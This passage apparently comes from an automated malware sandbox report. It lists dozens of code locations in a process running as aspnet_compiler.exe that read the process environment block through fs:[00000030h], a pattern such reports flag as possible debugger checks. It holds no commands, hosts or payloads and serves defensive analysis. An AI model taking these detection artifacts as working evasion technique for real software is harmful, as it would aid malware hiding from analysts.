          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014C1074 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01477016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01477016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01477016 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014C4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014C4015 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0140B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0140B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0140B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0140B02A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0142002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0142002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0142002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0142002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0142002D mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0141A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0141A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0141A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0141A830 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0148B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0148B8D0 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0148B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0148B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0148B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0148B8D0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0141B8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0141B8E4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_013F9080 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01473884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01473884 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_013F58EC mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_013F40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_013F40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_013F40E1 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014220A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014220A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014220A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014220A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014220A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014220A0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014390AF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0142F0BF mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0142F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0142F0BF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014C8B58 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01423B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01423B7A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0141A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0141A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0141A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0141A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0141A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0141A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0141A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0141A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0141A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0141A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0141A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0141A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0141A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0141A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0141A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0141A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0141A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0141A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0141A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0141A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0141A309 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014B131B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_013FDB60 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_013FF358 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_013FDB40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014753CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014753CA mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014203E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014203E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014203E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014203E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014203E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014203E2 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0141DBE9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014A23E3 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014A23E3 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014A23E3 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014B138A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0142138B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0142138B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0142138B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014AD380 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01401B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01401B8F mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0142B390 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01422397 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014C5BA5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01424BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01424BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01424BAD mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014BEA55 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01484257 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_013FAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_013FAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014AB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014AB260 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014C8A62 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_013F5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_013F5210 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_013F5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_013F5210 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0143927A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01408A0A mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01413A1C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014BAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014BAA16 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0141A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0141A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0141A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0141A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0141A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0141A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0141A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0141A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0141A229 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01434A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01434A2C mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0141B236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0141B236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0141B236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0141B236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0141B236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0141B236 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_013F9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_013F9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_013F9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_013F9240 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01422ACB mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_013F52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_013F52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_013F52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_013F52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_013F52A5 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014B4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014B4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014B4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014B4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014B4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014B4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014B4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014B4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014B4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014B4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014B4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014B4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014B4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014B4AEF mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01422AE4 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0142D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0142D294 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0140AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0140AAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0142FAB0 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01433D43 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01473540 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014A3D40 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_013FAD30 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01417D50 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0141C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0141C577 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0147A537 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014BE539 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01403D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01403D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01403D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01403D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01403D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01403D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01403D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01403D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01403D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01403D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01403D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01403D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01403D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_014C8D34 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01424D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01424D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01424D3B mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01476DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01476DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01476DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01476DC9 mov ecx, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01476DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_01476DC9 mov eax, dword ptr fs:[00000030h]
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeCode function: 7_2_0140D5E0 mov eax, dword ptr fs:[00000030h]
